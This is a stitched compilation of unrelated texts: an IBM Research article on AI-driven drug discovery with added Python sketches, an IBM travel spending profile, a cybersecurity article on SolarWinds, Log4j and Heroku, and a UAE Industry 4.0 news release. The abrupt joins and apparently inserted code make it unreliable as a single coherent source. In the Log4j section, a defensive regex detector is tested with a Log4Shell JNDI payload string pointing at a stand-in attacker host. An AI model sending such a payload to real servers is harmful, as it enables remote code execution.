IBM Research is now working on designing and implementing computational architectures that can convert the ever-increasing volume of healthcare and life-sciences data into information that can be used by scientists and industry experts the world over. Through an AI approach powered by high-performance computing (HPC)—a synergy of quantum and classical computing—and implemented in a hybrid cloud that takes advantage of both private and public environments, IBM is poised to lead the way in knowledge integration, AI-enriched simulation, and generative modeling in the healthcare and life sciences. Quantum computing, a rapidly developing technology, offers opportunities to explore and potentially address life-science challenges in entirely new ways.
“The convergence of advances in computation taking place to meet the growing challenges of an ever-shifting world can also be harnessed to help accelerate the rate of discovery in the healthcare and life sciences in unprecedented ways,” said Ajay Royyuru, IBM fellow and CSO for healthcare and life sciences at IBM Research. “At IBM, we are at the forefront of applying these new capabilities for advancing knowledge and solving complex problems to address the most pressing global health challenges.”
Innovation in the healthcare and life sciences, while overall a linear process leading from identifying drug targets to therapies and outcomes, relies on a complex network of parallel layers of information and feedback loops, each bringing its own challenges (Fig. 1). Success with target identification and validation is highly dependent on factors such as optimized genotype–phenotype linking to enhance target identification, improved predictions of protein structure and function to sharpen target characterization, and refined drug design algorithms for identifying new molecular entities (NMEs). New insights into the nature of disease are further recalibrating the notions of disease staging and of therapeutic endpoints, and this creates new opportunities for improved clinical-trial design, patient selection and monitoring of disease progress that will result in more targeted and effective therapies.
Powering these advances are several core computing technologies that include AI, quantum computing, classical computing, HPC, and the hybrid cloud. Different combinations of these core technologies provide the foundation for deep knowledge integration, multimodal data fusion, AI-enriched simulations and generative modeling. These efforts are already resulting in rapid advances in the understanding of disease that are beginning to translate into the development of better biomarkers and new therapeutics (Fig. 2).
“Our goal is to maximize what can be achieved with advanced AI, simulation and modeling, powered by a combination of classical and quantum computing on the hybrid cloud,” said Royyuru. “We anticipate that by combining these technologies we will be able to accelerate the pace of discovery in the healthcare and life sciences by up to ten times and yield more successful therapeutics and biomarkers.”
Developing new drugs hinges on both the identification of new disease targets and the development of NMEs to modulate those targets. Developing NMEs has typically been a one-sided process in which the in silico or in vitro activities of large arrays of ligands would be tested against one target at a time, limiting the number of novel targets explored and resulting in ‘crowding’ of clinical programs around a fraction of validated targets. Recent developments in proteochemometric modeling—machine learning-driven methods to evaluate de novo protein interactions in silico—promise to turn the tide by enabling the simultaneous evaluation of arrays of both ligands and targets, dramatically reducing the time required to identify potential NMEs.
Proteochemometric modeling relies on the application of deep machine learning tools to determine the combined effect of target and ligand parameter changes on the target–ligand interaction. This bimodal approach is especially powerful for large classes of targets in which active-site similarities and lack of activity data for some of the proteins make the conventional discovery process extremely challenging.
Protein kinases are ubiquitous components of many cellular processes, and their modulation using inhibitors has greatly expanded the toolbox of treatment options for cancer, as well as neurodegenerative and viral diseases. Historically, however, only a small fraction of the kinome has been investigated for its therapeutic potential owing to biological and structural challenges.
Using deep machine learning algorithms, IBM researchers have developed a generative modeling approach to access large target–ligand interaction datasets and leverage the information to simultaneously predict activities for novel kinase–ligand combinations1. Importantly, their approach allowed the researchers to determine that reducing the kinase representation from the full protein sequence to just the active-site residues was sufficient to reliably drive their algorithm, introducing an additional time-saving, data-use optimization step.
Machine learning methods capable of handling multimodal datasets and of optimizing information use provide the tools for substantially accelerating NME discovery and harnessing the therapeutic potential of large and sometimes only minimally explored molecular target spaces.
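As an illustration of the bimodal idea, the sketch below builds a single feature vector from a ligand fingerprint and a kinase active-site sequence, reflecting the finding above that active-site residues alone can suffice. This is a toy feature construction, not IBM's published model; the deep network is omitted, and the fingerprint bits and residue string are invented for the example:

```python
AMINO_ACIDS = "ACDEFGHIKLMNPQRSTVWY"

def site_features(active_site):
    """Amino-acid composition of the active-site residues only --
    a compact target representation."""
    counts = [active_site.count(aa) for aa in AMINO_ACIDS]
    total = len(active_site) or 1
    return [c / total for c in counts]

def pair_features(ligand_fingerprint, active_site):
    """Bimodal input: ligand and target descriptors are concatenated,
    so one model can score any kinase-ligand combination."""
    return list(ligand_fingerprint) + site_features(active_site)

x = pair_features([1, 0, 1, 1], "KDLAARNVLV")  # hypothetical inputs
print(len(x))  # 4 ligand bits + 20 amino-acid fractions = 24
```

A regression model trained on such joint vectors can then predict activities for target-ligand pairs never measured together, which is the source of the claimed speedup.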
Electronic health records (EHRs) and insurance claims contain a treasure trove of real-world data about the healthcare history, including medications, of millions of individuals. Such longitudinal datasets hold potential for identifying drugs that could be safely repurposed to treat certain progressive diseases not easily explored with conventional clinical-trial designs because of their long time horizons.
Turning observational medical databases into drug-repurposing engines requires the use of several enabling technologies, including machine learning-driven data extraction from unstructured sources and sophisticated causal inference modeling frameworks.
Parkinson’s disease (PD) is one of the most common neurodegenerative disorders in the world, affecting 1% of the population above 60 years of age. Within ten years of disease onset, an estimated 30–80% of PD patients develop dementia, a debilitating comorbidity that has made developing disease-modifying treatments to slow or stop its progression a high priority.
IBM researchers have now developed an AI-driven, causal inference framework designed to emulate phase 2 clinical trials to identify candidate drugs for repurposing, using real-world data from two PD patient cohorts totaling more than 195,000 individuals2. Extracting relevant data from EHRs and claims data, and using dementia onset as a proxy for evaluating PD progression, the team identified two drugs that significantly delayed progression: rasagiline, a drug already in use to treat motor symptoms in PD, and zolpidem, a known psycholeptic used to treat insomnia. Applying advanced causal inference algorithms, the IBM team was able to show that the drugs exert their effects through distinct mechanisms.
Using observational healthcare data to emulate otherwise costly, large and lengthy clinical trials to identify repurposing candidates highlights the potential for applying AI-based approaches to accelerate potential drug leads into prospective registration trials, especially in the context of late-onset progressive diseases for which disease-modifying therapeutic solutions are scarce.
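The emulated-trial idea, comparing outcomes between exposed and unexposed patients while adjusting for confounding, can be illustrated with a minimal inverse-propensity-weighting sketch. This is not IBM's causal inference framework; the records and the single binary confounder below are invented for the example:

```python
# Each record: (treated, confounder, outcome); outcome 1 = dementia onset.
records = [
    (1, 0, 0), (1, 0, 0), (1, 1, 1), (1, 1, 0),
    (0, 0, 0), (0, 0, 1), (0, 1, 1), (0, 1, 1),
]

def propensity(confounder):
    """P(treatment | confounder), here just the empirical rate."""
    group = [t for t, c, _ in records if c == confounder]
    return sum(group) / len(group)

def ipw_effect():
    """Inverse-propensity-weighted difference in outcome rates."""
    sums = {True: [0.0, 0.0], False: [0.0, 0.0]}  # weight, weighted outcome
    for t, c, y in records:
        p = propensity(c)
        w = 1 / p if t else 1 / (1 - p)
        sums[bool(t)][0] += w
        sums[bool(t)][1] += w * y
    return sums[True][1] / sums[True][0] - sums[False][1] / sums[False][0]

print(round(ipw_effect(), 3))  # → -0.5: treated patients progress less
```

Real emulations of phase 2 trials involve far richer confounder models, eligibility criteria, and time-to-event analysis, but the weighting logic is the same.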
One of the main bottlenecks in drug discovery is the high failure rate of clinical trials. Among the leading causes for this are shortcomings in identifying relevant patient populations and therapeutic endpoints owing to a fragmented understanding of disease progression.
Using unbiased machine-learning approaches to model large clinical datasets can advance the understanding of disease onset and progression, and help identify biomarkers for enhanced disease monitoring, prognosis, and trial enrichment that could lead to higher rates of trial success.
Huntington’s disease (HD) is an inherited neurodegenerative disease that results in severe motor, cognitive and psychiatric disorders and occurs in about 3 per 100,000 inhabitants worldwide. HD is a fatal condition, and no disease-modifying treatments have been developed to date.
An IBM team has now used a machine-learning approach to build a continuous dynamic probabilistic disease-progression model of HD from data aggregated from multiple disease registries3. Based on longitudinal motor, cognitive and functional measures, the researchers were able to identify nine disease states of clinical relevance, including some in the early stages of HD. Retrospective validation of the results with data from past and ongoing clinical studies showed the ability of the new disease-progression model of HD to provide clinically meaningful insights that are likely to markedly improve patient stratification and endpoint definition.
Model-based determination of disease stages and relevant clinical and digital biomarkers that lead to better monitoring of disease progression in individual participants is key to optimizing trial design and boosting trial efficiency and success rates.
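A continuous dynamic probabilistic model is beyond a short example, but the underlying notion of probabilistic transitions between discrete disease states can be sketched with a toy Markov chain. The three states and transition probabilities below are invented, not drawn from the HD study:

```python
# Hypothetical 3-state progression model (early / mid / late) -- a toy
# stand-in for the 9-state model; states only advance, never regress.
T = [
    [0.90, 0.10, 0.00],
    [0.00, 0.85, 0.15],
    [0.00, 0.00, 1.00],
]

def step(dist):
    """One assessment interval: push probability mass along T."""
    return [sum(dist[i] * T[i][j] for i in range(3)) for j in range(3)]

dist = [1.0, 0.0, 0.0]  # everyone starts in the early state
for _ in range(10):     # ten assessment intervals
    dist = step(dist)
print([round(p, 3) for p in dist])
```

Fitting such transition probabilities to longitudinal registry data, and letting observed measures only partially reveal the hidden state, is what turns this toy into a usable progression model for stratification and endpoint design.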
IBM has established its mission to advance the pace of discovery in healthcare and life sciences through the application of a versatile and configurable collection of accelerator and foundation technologies supported by a backbone of core technologies (Fig. 1). It recognizes that a successful campaign to accelerate discovery for therapeutics and biomarkers to address well-known pain points in the development pipeline requires external, domain-specific partners to co-develop, practice, and scale the concept of technology-based acceleration. The company has already established long-term commitments with strategic collaborators worldwide, including the recently launched joint Cleveland Clinic–IBM Discovery Accelerator, which will house the first private-sector, on-premises IBM Quantum System One in the United States. The program is designed to actively engage with universities, government, industry, startups and other relevant organizations, cultivating, supporting and empowering this community with open-source tools, datasets, technologies and educational resources to help break through long-standing bottlenecks in scientific discovery. IBM is engaging with biopharmaceutical enterprises that share this vision of accelerated discovery.
“Through partnerships with leaders in healthcare and life sciences worldwide, IBM intends to boost the potential of its next-generation technologies to make scientific discovery faster, and the scope of the discoveries larger than ever,” said Royyuru. “We ultimately see accelerated discovery as the core of our contribution to supercharging the scientific method.”
2019 U.S.-Booked Air Volume: $415 million
Primary U.S. Online Booking Tool: Concur
Primary U.S. Payment Supplier: American Express
Card Program: Individual Bill/Central Pay
Primary U.S. Expense Supplier: Concur
Primary U.S. Travel Risk Management Supplier: ISOS
Consolidated Global TMC: Amex GBT
Technology and business services giant IBM in 2019 all but held steady in terms of U.S.-booked air volume, spending about $2 million less year over year.
The company in 2019 deployed a cognitive analytics dashboard and offers it outside the company as well. IBM Travel Manager uses machine learning to help users gain program insight and inform a more dynamic airline and hotel sourcing approach that relies less on traditional requests for proposals. The company also for the first time in 2019 implemented and deployed hotel reshopping technology.
IBM in 2019 also refined its online booking strategy, insourcing Concur Travel's capabilities to manage a process staffed by IBM employees. About 88 percent of U.S.-booked tickets in 2019 were booked online through that channel, about 95 percent of those without agent assistance.
IBM at the end of 2019 had about 352,600 employees worldwide, about 2,000 more than at the end of 2018.
Meredith is the CEO of AutoRABIT, a leader in Salesforce.com DevSecOps and data protection for regulated industries.
Cybersecurity has become a top concern for businesses and organizations in regulated industries. The exposure of sensitive data can have wide-ranging impacts, including a failure to meet regulatory requirements, costly restoration processes, loss of customer confidence and more.
Potential sources for data breaches, exposures and loss are increasingly varied. Something as simple as an accidental deletion by a team member can be incredibly costly. A single minute of downtime resulting from data loss or corruption can cost a company millions of dollars.
Adequate preparation is the only way a business can avoid falling victim to the next high-profile data exposure event. And the best way to prepare for what’s coming next is to learn from the past. SolarWinds, Log4j and Heroku provide very useful context for preparing your environment for the next cyberattack.
Recent High-Profile Hacks
SolarWinds, Log4j and Heroku are just some of the recent high-profile attacks in the U.S., but the list continues. Spring4Shell and the LAPSUS$ vulnerability also wreaked havoc, further proving the urgent need for big companies to protect their customers’ data with the strongest data security measures possible.
The SolarWinds hack showed how easily a system could become compromised, even if an organization doesn’t directly experience a data breach. SolarWinds, a technology software firm, experienced a cyberattack in 2020. Because SolarWinds software was integrated with high-profile organizations, the hack gave attackers access to their systems, including extremely sensitive areas of the U.S. government such as the Department of Homeland Security and the Treasury Department, according to Business Insider.
Apache announced a security issue with Log4j, a Java-based logging utility, in late 2021. Every internet-connected device that ran Log4j was susceptible to the vulnerability, which was a huge problem for the top-tier companies that used it, such as Amazon, Oracle and IBM. This was the largest hack of its kind in over a decade.
The vulnerability allowed attackers to execute arbitrary code by exploiting the Java Naming and Directory Interface (JNDI). By introducing a single crafted string into the log, hackers could inject their own code, potentially gaining full control of a target’s system.
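On the defensive side, the plain form of that exploit string is easy to screen for in logs. The sketch below is a minimal detector, not a complete mitigation; real attacks used obfuscated variants (nested lookups, mixed case tricks) that a simple pattern like this would miss:

```python
import re

# Matches the plain form of the Log4Shell exploit string; obfuscated
# variants require far more thorough inspection or patching Log4j itself.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def suspicious(log_line):
    """True if a log line contains an unobfuscated JNDI lookup string."""
    return bool(JNDI_PATTERN.search(log_line))

print(suspicious("GET / user-agent=${jndi:ldap://evil.example/a}"))  # True
print(suspicious("GET / user-agent=Mozilla/5.0"))                    # False
```

The durable fix was upgrading Log4j (or disabling JNDI lookups), since detection alone cannot keep pace with obfuscation.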
Heroku is a cloud platform as a service (PaaS) that experienced a cyberattack in April of this year, when OAuth tokens for its GitHub integration were exposed. All users of the integration were potentially affected, leading Heroku to require its users to reset their passwords. With the stolen tokens, attackers may have been able to access the system at large and compromise a token for a Heroku machine account, creating the possibility of downloading data from the private code repositories of some GitHub users on the Heroku platform.
Analyzing Your Current Strategy
A comprehensive overhaul of a data security strategy starts with first assessing the successes and potential vulnerabilities of current tools and procedures. Throughout this entire process, a safe, clean flow of feedback between every department and team is crucial.
An example process to identify potential vulnerabilities may include these six steps.
1. Identify protected data: Scan the system for any data or information that could prove damaging if exposed, such as PII (personally identifiable information), financial information and even certain types of metadata.
2. Audit permissions: Ninety-five percent of breaches are the result of human error. Make sure only those who need access to sensitive information have it.
3. Analyze entry points: Fortify login screens and limit third-party account connections to cut off major access points for cybercriminals.
4. Communicate best practices: Strong passwords, knowing how to spot phishing attempts, only accessing company software with approved devices—actions such as these offer large degrees of protection.
5. Assess reporting capabilities: Documentation is essential for finding and stopping data security breaches. Ensure you have access to access logs, login history and other types of security reports.
6. Evaluate backup strategy: A reliable and fully functional data backup is critical after a data loss event. Ensure the backup strategy offers the protection you need.
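Step 1 of the checklist above, identifying protected data, can be sketched as a simple scan for common PII patterns. The patterns below are illustrative assumptions, not a production scanner, which would cover many more PII types, data stores, and metadata:

```python
import re

# Hypothetical patterns for a step-1 scan; real scanners cover far more.
PII_PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
    "card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def scan(text):
    """Return the PII categories found in a blob of text."""
    return sorted(k for k, p in PII_PATTERNS.items() if p.search(text))

print(scan("Contact jane.doe@example.com, SSN 123-45-6789"))
# → ['email', 'ssn']
```

Running a scan like this across exports, logs, and sandboxes shows where sensitive data actually lives, which then drives the permission audit in step 2.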
To avoid being the next company to experience a major data loss, start preparing today. Securing your entry points, ensuring team members maintain mindful practices and employing intentional tools are considered by large companies today to be non-negotiable aspects of a data security plan.
It’s impossible to guess what the next huge cyberattack will be. The only thing we can do is put barriers in place to fortify our technical environments against bad actors.
Learning from previous breaches offers a glimpse into a possible future that we all want to avoid. Use these lessons as a guide to put a proper data security strategy in place and avoid costly and damaging attacks.
The UAE Ministry of Industry and Advanced Technology (MoIAT) and EDGE have signed a memorandum of understanding (MoU) to establish the UAE’s first Industry 4.0 Enablement Centre.
The centre is aimed at promoting, enabling, and supporting the digital transformation and the adoption of Industry 4.0 technologies across the country’s manufacturing sector.
The Ministry and EDGE will explore how the Enablement Centre can leverage what has been achieved by the EDGE Learning & Innovation Factory (LIF), a state-of-the-art learning, innovation, and demonstration centre for Industry 4.0, operational excellence, and advanced technology. Its offerings include learning, innovation, and demonstration to the wider industrial ecosystem, said a statement.
The agreement was signed in the presence of Dr Sultan Al Jaber, UAE Minister of Industry and Advanced Technology; Sarah Al Amiri, Minister of State for Public Education and Advanced Technology; Faisal Al Bannai, Chairman of the Board of Directors, EDGE; and Mansour AlMulla, Managing Director & CEO, EDGE.
It was signed by Mohammed Al Qassim, Director of Technology Development and Adoption at Ministry of Industry and Advanced Technology; and Reda Nidhakou, Senior Vice President of Strategy & Portfolio Management, EDGE, at the EDGE Learning & Innovation Factory, located in Abu Dhabi.
Dr Al Jaber, Al Amiri, and Al Qassim were received by Faisal Al Bannai and Mansour AlMulla at the EDGE Learning & Innovation Factory for a comprehensive tour of the facility. The tour highlighted how organisations can enhance their operations by adopting the right processes and methodologies, how they can go further by adopting the right technologies, and how they can leverage automation to build a data-driven organisation.
EDGE LIF is an end-to-end automated and integrated factory that demonstrates digital manufacturing use cases to trainees. Each trainee will be able to participate in a simulation to explore how technology can empower production. In the simulation, trainees use an app to configure a small car, add a tagline, and track its production across the factory’s 4 islands in less than 7 minutes.
The Smart and Lean Production training at EDGE LIF is key to the Lean Digital curriculum. Lean Digital teaches how lead-times, quality and cost can be enhanced by the introduction of Industry 4.0 technologies.
The EDGE Learning & Innovation Factory SLF simulation is conducted over three rounds, covering traditional production processes, mechanisms for discovering manufacturing and productivity challenges, and the implementation of technological solutions that support operations. These range from digital work instructions and a dashboard of key performance indicators to more advanced solutions that integrate automated work tasks and mechanisms, such as logistics smartwatches and barcode-scanning smart gloves.
As part of this partnership, EDGE will host a series of initiatives, training courses, and programs at the facility from September this year with the aim of accelerating technology adoption in the industrial sector, enhancing collaboration within the UAE’s advanced technology ecosystem, and enabling the co-creation and development of innovative solutions among industry players.
The Industry 4.0 Enablement Centre will comprise various activities, including raising awareness around Industry 4.0 technologies and practices, upskilling manufacturers’ capabilities with specialised training curricula, demonstrating 4IR technology benefits, supporting the development of Industry 4.0 strategies, and creating a testbed and an open-access environment to pilot and co-develop innovative technologies.
EDGE is part of the Champions Network, a group of leading national industrial companies that deploy 4IR technologies and solutions in their operations. It includes companies such as Adnoc, Honeywell, Unilever, Schneider Electric, Emirates Global Aluminium (EGA), Cisco, Siemens, Aveva, SAP, Etisalat, IBM, Huawei, Strata, Microsoft, PTC, and Ericsson.
The Champions Network is a core pillar of UAE Industry 4.0 designed to accelerate the integration of 4IR solutions and applications across the UAE’s industrial sector, enhancing the UAE’s overall industrial competitiveness, driving down costs, increasing productivity and efficiency, enhancing quality, improving safety and creating new jobs.
MoIAT, EDGE, and Emirates Development Bank (EDB) signed a mutual agreement during the Make it in the Emirates Forum in June this year to support the development of manufacturing at EDGE, one of the world’s top 25 advanced technology groups for defence. Under the agreement, EDB will provide financing of up to AED1 billion to support EDGE Group’s effort to adopt advanced technology and manufacturing processes and will contribute to increasing its exports, supporting the growth of the national economy. MoIAT will provide EDGE with a robust roadmap which will reinforce the Group’s position as one of the world’s leading and most financially sound suppliers of military hardware and technology. - TradeArabia News Service